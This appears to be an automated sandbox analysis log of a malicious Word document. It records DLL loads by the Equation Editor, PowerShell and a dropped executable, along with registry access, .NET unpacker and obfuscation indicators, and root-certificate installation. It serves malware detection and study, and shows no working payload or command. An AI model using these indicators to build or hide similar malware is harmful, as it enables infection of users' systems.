Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: na.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\na.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: na.doc

Static file information: File size 2531309 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation

.NET source code contains potential unpacker

Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs	.Net Code: vsx5rZLaxx System.Reflection.Assembly.Load(byte[])
Source: 5.2.cmnjgwhesilo61000.exe.610000.0.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs	.Net Code: vsx5rZLaxx System.Reflection.Assembly.Load(byte[])
Source: 5.2.cmnjgwhesilo61000.exe.3660770.5.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00606666 push eax; ret	2_2_00606667
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00607669 push eax; ret	2_2_0060766B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060606A push ecx; ret	2_2_0060606B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060607A push ecx; ret	2_2_0060607B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060605A push ecx; ret	2_2_0060605B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060665E push ecx; ret	2_2_0060665F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060102A push eax; retn 005Fh	2_2_00601001
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060602F push ecx; ret	2_2_0060603B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060600A push ecx; ret	2_2_0060600B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00607C0E push edx; ret	2_2_00607C0F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060600F push ecx; ret	2_2_0060601B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00607C16 push edx; ret	2_2_00607C17
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605EED push edx; ret	2_2_00605EEF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006076C9 push ecx; ret	2_2_006076CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006076D1 push ecx; ret	2_2_006076D3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006060AA push ecx; ret	2_2_006060AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605AB6 push edx; ret	2_2_00605AB7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006060BA push ecx; ret	2_2_006060BB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060629E push eax; ret	2_2_0060629F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F8F44 push eax; retf	2_2_005F8F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005EF739 push esi; ret	2_2_005EF747
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605BE8 push edx; ret	2_2_00605BEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605BF0 push edx; ret	2_2_00605BF3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605FFA push ecx; ret	2_2_00605FFB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00605FB8 push ecx; ret	2_2_00605FBB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00600FBA push eax; retn 005Fh	2_2_00601001
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_002B21E9 push ebx; iretd	7_2_002B21EA
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 7_2_005690F8 pushfd ; retn 0050h	7_2_005690F9

Source: pKL9HXcZosWfPt1[1].exe.2.dr	Static PE information: section name: .text entropy: 7.956972299171152
Source: cmnjgwhesilo61000.exe.2.dr	Static PE information: section name: .text entropy: 7.956972299171152

Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, gNQbaWLXsFaFvpBXJi.cs	High entropy of concatenated method names: 'A1MERoALPq', 'GiHEt1Hr9h', 'KwyEqnGTFi', 'VeoEFK9lXd', 'gpLEaxnXY0', 'pkFqx5bHs7', 'M65qne5uXo', 'GJoqMUjjBq', 'zpKqe3ykUl', 'iQpq6ZHv6q'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, CBhtpuZu0niEWFG3RD.cs	High entropy of concatenated method names: 'e5MqAX3kPe', 'SLmqQDsluC', 'rjbYJ7cfPj', 'XuXY2vpy45', 'st8YZ99L1C', 'fOAY3wg2xN', 'Iw7YUTx09q', 'SgBYIHenRP', 'h34Y7lviMZ', 'mJoYsCjsbb'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, lV3xFKccCDLii0K48Q.cs	High entropy of concatenated method names: 'iuPwFPnNes', 'pXnwad1res', 'vmww1jHKSO', 'SgbwXVSKPO', 'I2RwCZSOV7', 'o8dwgMcWC2', 'xGasU0GJAuQZseLmNY', 'TZWRsL61575LQxHXhB', 'imWwwvBiAF', 'Q08wKGXcvi'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, rFI1jpkhIAM5j1q8U4.cs	High entropy of concatenated method names: 'VCSOwoxDBl', 'Ry5OKGjGBa', 'lFYO5JiGPR', 'aFgOB6ZjWJ', 'CgBOtTRCud', 'NjXOqptwhF', 'hi7OEfp125', 'OO7pMxKjNv', 'vcNpe2oPof', 'f0Vp6HQ4Ip'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, FoIYebzQm2hqfWSd7X.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0nOT3ehp6', 'jioOCxGbc7', 'CNHOg57oXi', 'BlcOjLqOVO', 'DoOOpmSQXR', 'BDeOOckvLr', 'K0xOkHHP2W'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, qG8HKrNydjl44Zvrcy.cs	High entropy of concatenated method names: 'ToString', 'EM6gm9T5Vu', 'SmYgGIKJdf', 'POegJiep7d', 'uGKg26KVuj', 'PbOgZtR3sP', 'jl5g3k8wXT', 'uQDgUq5b9v', 'dPfgIUmInk', 'Gaog7rE6v9'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, Ue6mJ2s3lb0V1AYBRp.cs	High entropy of concatenated method names: 'Dispose', 'ltXw6NZrJJ', 'OOTbG9JaEg', 'b4q44GyQFo', 'c7rwWq6p4l', 'VoowzRPxNg', 'ProcessDialogKey', 'aQUbuPGRpy', 'yaDbw4OZTY', 'T2DbbqVEgx'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, RhLUmQgqaEfGqR2hvw.cs	High entropy of concatenated method names: 'hnJpyj7aNG', 'RM9pGGbHeq', 'QCYpJrd2Hr', 'ntbp2EyfC1', 'UOspvLorD4', 'F1ppZESVYw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, BV89Ny39oFva95VeBk.cs	High entropy of concatenated method names: 'HibYo2lmaD', 'EdtYDw3Vfw', 'wO2Y9osDOY', 'dXvYdrGj6q', 'HSRYCchewG', 'oWQYghvhis', 'xIqYjaZ1uK', 'gNjYpfF21c', 'C8AYOwGECx', 'vudYkaqj3m'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs	High entropy of concatenated method names: 'vjPKREFlQe', 'Kd1KBC6ToO', 'q3UKtUPnqc', 'd2BKYoHTP5', 'R4IKqgqXM6', 'RNBKEJoxll', 'rP5KFCXpSt', 'xTCKaF5Ln5', 'cr7KNP6fM5', 'AX4K1El6CM'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, yR4F7uBJmXcJCfaA9e.cs	High entropy of concatenated method names: 'Q4MpBI4xHu', 'BdrptD2sjy', 'VRPpYVcN9N', 'KcQpq7cury', 'qytpEK9mK5', 'GWMpFGK1cU', 'iUnpaWRoRy', 'j5ZpNdubDn', 'jMvp1xugNM', 'zNipXoS9pA'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, fNsjdUyrnXvaMejHKy9.cs	High entropy of concatenated method names: 'eOJOHrcED0', 'p6pOStTCnI', 'n2LOrL3s5t', 'Tr5OoCL6gA', 'ARtOA8ytJc', 'O8WODLsklC', 'PJMOQqKAAb', 'jNjO9Hwx23', 'bJeOdDVWvh', 'pRhOVoKNyD'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, hxMIVi9pYAP9wjI5QI.cs	High entropy of concatenated method names: 'f2htvXocjg', 'Qg2t0w5yGU', 'u6dth0dfFA', 'XmDtfnft9S', 'exNtx4y9fN', 'RULtnB62XS', 'w54tMMEHtY', 'ilvte88d0I', 'Y1et6FBMIR', 'jaqtWFVlnC'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, sMGxPejB33K4rx4e60.cs	High entropy of concatenated method names: 'qC0j11vu2K', 'GHmjXXx72h', 'ToString', 'PdTjBWSJb1', 'Ql9jtLrUKK', 'fVmjYqY4vc', 'ew9jqy5lDb', 'bJFjEVEBdR', 'SHZjFESWjh', 'ixJjaEjB6d'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, Lf7MXhdeXPWlJnHyOp.cs	High entropy of concatenated method names: 'i2ICsm95uJ', 'LtOCLJwBxR', 'jjmCvZmcNf', 'AuWC07Bv7n', 'RqvCGYpVT0', 'CIZCJhnlcU', 'bBcC2WJUEq', 'umUCZLi7Bs', 'cbJC3bnWD1', 'h4mCUkPmdl'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, KK71ylRYJPdeoYpMtn.cs	High entropy of concatenated method names: 'ycBT9AyCP7', 'j0NTdnfp1a', 'o0fTy158Tf', 'RriTGdjIJq', 'vHmT2YDqhn', 'O4TTZ813rL', 'U9jTUpe6Dn', 'n7oTIfkPF7', 'NnyTsy0TV9', 'n1pTmgniZE'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, qjttoFyyDt8gYvxevtf.cs	High entropy of concatenated method names: 'ToString', 'cZ1kKaaDby', 'zUdk5tGSeC', 'no7kRlJrX7', 'vy4kBpgQUO', 'zQ0kt3VDr1', 'DyDkYEXShQ', 'egVkqKU9qU', 'UUYDIbHc4FHgyHFDxvS', 'xIp0TKHswrKIbyeyXLT'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, JpIAI22TPeuUCKgw8d.cs	High entropy of concatenated method names: 'QErjekxGsZ', 'FXhjWQyDmo', 'uQupuUm1v5', 'S0RpwsuMRZ', 'f3Bjm4OOhC', 'vQxjL8L1ZE', 'i1fjiirOpo', 'RWCjvWaHgx', 'wwmj0uFIeH', 'naOjhQR9xY'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, CLs2kbe5U6HxbH6rln.cs	High entropy of concatenated method names: 'omJrZCkSS', 'jeVoNhX4p', 'xyoDYsKFj', 'UxdQO28Iw', 'uIpdCS53K', 'T9fVMTmhm', 'WBwQXkVKTkThYvZHLr', 'RFLe8WPpMjZEWFxkU2', 'FrkpCpO16', 'UhWkcY0Hl'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, Ur1wr2Gv8belLDObbn.cs	High entropy of concatenated method names: 'wegFHqPAJM', 'XGlFSBl5yl', 'zqQFrTKaqr', 'YcLFo8ePl0', 'QhHFARDUvD', 'VCjFDpbGgb', 'wtbFQ0V1KY', 'RrfF9aT53D', 'UaGFdLNjZi', 'nsJFV0l2up'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, gNQbaWLXsFaFvpBXJi.cs	High entropy of concatenated method names: 'A1MERoALPq', 'GiHEt1Hr9h', 'KwyEqnGTFi', 'VeoEFK9lXd', 'gpLEaxnXY0', 'pkFqx5bHs7', 'M65qne5uXo', 'GJoqMUjjBq', 'zpKqe3ykUl', 'iQpq6ZHv6q'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, CBhtpuZu0niEWFG3RD.cs	High entropy of concatenated method names: 'e5MqAX3kPe', 'SLmqQDsluC', 'rjbYJ7cfPj', 'XuXY2vpy45', 'st8YZ99L1C', 'fOAY3wg2xN', 'Iw7YUTx09q', 'SgBYIHenRP', 'h34Y7lviMZ', 'mJoYsCjsbb'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, lV3xFKccCDLii0K48Q.cs	High entropy of concatenated method names: 'iuPwFPnNes', 'pXnwad1res', 'vmww1jHKSO', 'SgbwXVSKPO', 'I2RwCZSOV7', 'o8dwgMcWC2', 'xGasU0GJAuQZseLmNY', 'TZWRsL61575LQxHXhB', 'imWwwvBiAF', 'Q08wKGXcvi'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, rFI1jpkhIAM5j1q8U4.cs	High entropy of concatenated method names: 'VCSOwoxDBl', 'Ry5OKGjGBa', 'lFYO5JiGPR', 'aFgOB6ZjWJ', 'CgBOtTRCud', 'NjXOqptwhF', 'hi7OEfp125', 'OO7pMxKjNv', 'vcNpe2oPof', 'f0Vp6HQ4Ip'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, FoIYebzQm2hqfWSd7X.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0nOT3ehp6', 'jioOCxGbc7', 'CNHOg57oXi', 'BlcOjLqOVO', 'DoOOpmSQXR', 'BDeOOckvLr', 'K0xOkHHP2W'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, qG8HKrNydjl44Zvrcy.cs	High entropy of concatenated method names: 'ToString', 'EM6gm9T5Vu', 'SmYgGIKJdf', 'POegJiep7d', 'uGKg26KVuj', 'PbOgZtR3sP', 'jl5g3k8wXT', 'uQDgUq5b9v', 'dPfgIUmInk', 'Gaog7rE6v9'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, Ue6mJ2s3lb0V1AYBRp.cs	High entropy of concatenated method names: 'Dispose', 'ltXw6NZrJJ', 'OOTbG9JaEg', 'b4q44GyQFo', 'c7rwWq6p4l', 'VoowzRPxNg', 'ProcessDialogKey', 'aQUbuPGRpy', 'yaDbw4OZTY', 'T2DbbqVEgx'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, RhLUmQgqaEfGqR2hvw.cs	High entropy of concatenated method names: 'hnJpyj7aNG', 'RM9pGGbHeq', 'QCYpJrd2Hr', 'ntbp2EyfC1', 'UOspvLorD4', 'F1ppZESVYw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, BV89Ny39oFva95VeBk.cs	High entropy of concatenated method names: 'HibYo2lmaD', 'EdtYDw3Vfw', 'wO2Y9osDOY', 'dXvYdrGj6q', 'HSRYCchewG', 'oWQYghvhis', 'xIqYjaZ1uK', 'gNjYpfF21c', 'C8AYOwGECx', 'vudYkaqj3m'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs	High entropy of concatenated method names: 'vjPKREFlQe', 'Kd1KBC6ToO', 'q3UKtUPnqc', 'd2BKYoHTP5', 'R4IKqgqXM6', 'RNBKEJoxll', 'rP5KFCXpSt', 'xTCKaF5Ln5', 'cr7KNP6fM5', 'AX4K1El6CM'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, yR4F7uBJmXcJCfaA9e.cs	High entropy of concatenated method names: 'Q4MpBI4xHu', 'BdrptD2sjy', 'VRPpYVcN9N', 'KcQpq7cury', 'qytpEK9mK5', 'GWMpFGK1cU', 'iUnpaWRoRy', 'j5ZpNdubDn', 'jMvp1xugNM', 'zNipXoS9pA'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, fNsjdUyrnXvaMejHKy9.cs	High entropy of concatenated method names: 'eOJOHrcED0', 'p6pOStTCnI', 'n2LOrL3s5t', 'Tr5OoCL6gA', 'ARtOA8ytJc', 'O8WODLsklC', 'PJMOQqKAAb', 'jNjO9Hwx23', 'bJeOdDVWvh', 'pRhOVoKNyD'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, hxMIVi9pYAP9wjI5QI.cs	High entropy of concatenated method names: 'f2htvXocjg', 'Qg2t0w5yGU', 'u6dth0dfFA', 'XmDtfnft9S', 'exNtx4y9fN', 'RULtnB62XS', 'w54tMMEHtY', 'ilvte88d0I', 'Y1et6FBMIR', 'jaqtWFVlnC'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, sMGxPejB33K4rx4e60.cs	High entropy of concatenated method names: 'qC0j11vu2K', 'GHmjXXx72h', 'ToString', 'PdTjBWSJb1', 'Ql9jtLrUKK', 'fVmjYqY4vc', 'ew9jqy5lDb', 'bJFjEVEBdR', 'SHZjFESWjh', 'ixJjaEjB6d'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, Lf7MXhdeXPWlJnHyOp.cs	High entropy of concatenated method names: 'i2ICsm95uJ', 'LtOCLJwBxR', 'jjmCvZmcNf', 'AuWC07Bv7n', 'RqvCGYpVT0', 'CIZCJhnlcU', 'bBcC2WJUEq', 'umUCZLi7Bs', 'cbJC3bnWD1', 'h4mCUkPmdl'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, KK71ylRYJPdeoYpMtn.cs	High entropy of concatenated method names: 'ycBT9AyCP7', 'j0NTdnfp1a', 'o0fTy158Tf', 'RriTGdjIJq', 'vHmT2YDqhn', 'O4TTZ813rL', 'U9jTUpe6Dn', 'n7oTIfkPF7', 'NnyTsy0TV9', 'n1pTmgniZE'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, qjttoFyyDt8gYvxevtf.cs	High entropy of concatenated method names: 'ToString', 'cZ1kKaaDby', 'zUdk5tGSeC', 'no7kRlJrX7', 'vy4kBpgQUO', 'zQ0kt3VDr1', 'DyDkYEXShQ', 'egVkqKU9qU', 'UUYDIbHc4FHgyHFDxvS', 'xIp0TKHswrKIbyeyXLT'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, JpIAI22TPeuUCKgw8d.cs	High entropy of concatenated method names: 'QErjekxGsZ', 'FXhjWQyDmo', 'uQupuUm1v5', 'S0RpwsuMRZ', 'f3Bjm4OOhC', 'vQxjL8L1ZE', 'i1fjiirOpo', 'RWCjvWaHgx', 'wwmj0uFIeH', 'naOjhQR9xY'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, CLs2kbe5U6HxbH6rln.cs	High entropy of concatenated method names: 'omJrZCkSS', 'jeVoNhX4p', 'xyoDYsKFj', 'UxdQO28Iw', 'uIpdCS53K', 'T9fVMTmhm', 'WBwQXkVKTkThYvZHLr', 'RFLe8WPpMjZEWFxkU2', 'FrkpCpO16', 'UhWkcY0Hl'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, Ur1wr2Gv8belLDObbn.cs	High entropy of concatenated method names: 'wegFHqPAJM', 'XGlFSBl5yl', 'zqQFrTKaqr', 'YcLFo8ePl0', 'QhHFARDUvD', 'VCjFDpbGgb', 'wtbFQ0V1KY', 'RrfF9aT53D', 'UaGFdLNjZi', 'nsJFV0l2up'

Persistence and Installation Behavior

Installs new ROOT certificates

